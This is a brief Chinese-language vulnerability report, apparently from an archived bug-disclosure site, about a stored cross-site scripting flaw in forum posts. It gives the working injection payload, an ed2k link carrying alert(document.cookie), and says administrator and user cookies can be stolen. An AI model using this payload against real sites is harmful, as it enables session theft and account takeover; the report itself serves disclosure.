漏洞细节 发表新帖子 帖子内容输入 ed2k://|file|test|'+alert(document.cookie)+'|test/ 测试成功 可盗取管理员COOKIE和用户COOKIE 参见:https://bugs.shuimugan.com/bug/view?bug_no=60597